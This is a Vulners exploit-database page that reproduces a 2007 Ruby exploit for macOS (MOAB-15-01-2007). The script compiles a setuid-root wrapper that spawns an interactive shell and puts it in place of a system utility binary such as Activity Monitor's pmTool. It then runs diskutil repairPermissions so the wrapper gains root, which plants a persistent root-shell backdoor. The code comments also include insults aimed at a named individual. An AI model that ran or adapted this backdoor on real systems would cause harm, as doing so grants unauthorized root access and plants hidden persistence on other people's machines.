Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

MOAB-15-01-2007.rb.txt

🗓️ 20 Jan 2007 00:00:00Reported by LMHType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 27 Views

This Ruby script exploits a vulnerability (MOAB-15-01-2007) to place a root shell backdoor on a specific system file, leveraging a flaw in disk utility repair permissions setuid. It also creates a back-up of the original file and provides instructions for restoring it

Code
`# !/usr/bin/ruby  
# Exploit for MOAB-15-01-2007  
# (c) 2006 LMH <lmh [at] info-pull.com>.  
#  
# Note: It's a generic exploit, you can use it over any binary writable which  
# is set as root setuid by diskutil repair permissions. Simply change the path.  
# Blame Apple for doing such a piece of **** and relying on flawed DAC.  
#  
# Line-noise: Jackass of the Week  
# -------  
# On Jan 14, 11:10 pm, "William A. Carrel" <[email protected]> wrote:  
# > Works for me. I see yesterday's was an HFS+ panic.  
# > > Is the info-pull/MoAB/MoKB site down, or is it just me that can't  
# > > access it?  
# Sorry, my fault. I blocked access to it at this end when they started  
# distributing malware so that nobody downloaded anything accidentally. I  
# can see it again now.  
#   
# Kind regards,  
#   
# Alastair.  
# --------  
#  
# Hmm, false, it was the other way around:  
#  
# target prot opt source destination  
# (...)  
# DROP all -- ajhoughton.plus.com anywhere  
# (...)  
#  
# "LMH’s continued propensity for insults, which frankly I don’t particularly  
# appreciate." -- http://alastairs-place.net/2007/01/how-childish/  
#  
# There's nothing wrong about embarrassing you for being an absurd liar.  
# Live with it, and then post to your 'blog' as usual. Free Zealot Apple PR (tm).  
#  
  
require 'fileutils'  
  
DISK_UTIL_COMMAND = "/usr/sbin/diskutil repairPermissions /"  
AVAILABLE_TARGETS = [  
"/Applications/Utilities/Activity Monitor.app/Contents/Resources/pmTool",  
"/Applications/Utilities/Keychain Access.app/Contents/Resources/kcproxy",  
"/Applications/Utilities/ODBC Administrator.app/Contents/Resources/iodbcadmintool"  
]  
  
path_to_bin = (AVAILABLE_TARGETS[ARGV[0].to_i] || AVAILABLE_TARGETS[0])  
path_to_back = File.join("/tmp", File.basename(path_to_bin))  
  
puts "++ Starting: #{path_to_bin}"  
puts "++ Back-up: #{path_to_back}"  
  
if File.exists?(path_to_bin)  
unless File.exists?(path_to_back)  
FileUtils.cp(path_to_bin, path_to_back)  
end  
end  
  
puts "++ Compiling a shell wrapper at /tmp/o..."  
WRAP_CODE = 'int main() { setuid(0); setgid(0); seteuid(0); system("/bin/sh -i"); }'  
COMPILE = "echo '#{WRAP_CODE}' > /tmp/t.c && gcc /tmp/t.c -s -o /tmp/o && rm -rf /tmp/t.c"  
system(COMPILE)  
  
puts "++ Placing backdoor..."  
FileUtils.mv("/tmp/o", path_to_bin)  
system(DISK_UTIL_COMMAND)  
  
puts "++ Finished. Backup at #{path_to_back}."  
puts "++ Repair with: mv '#{path_to_back}' '#{path_to_bin}'"  
puts "++ Enjoy root shell."`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
20 Jan 2007 00:00Current
7.4High risk
Vulners AI Score7.4
rubyvulnerabilitymoab-15-01-2007root shellbackdoordisk utilityrepair permissionssetuidback-upinstructions
27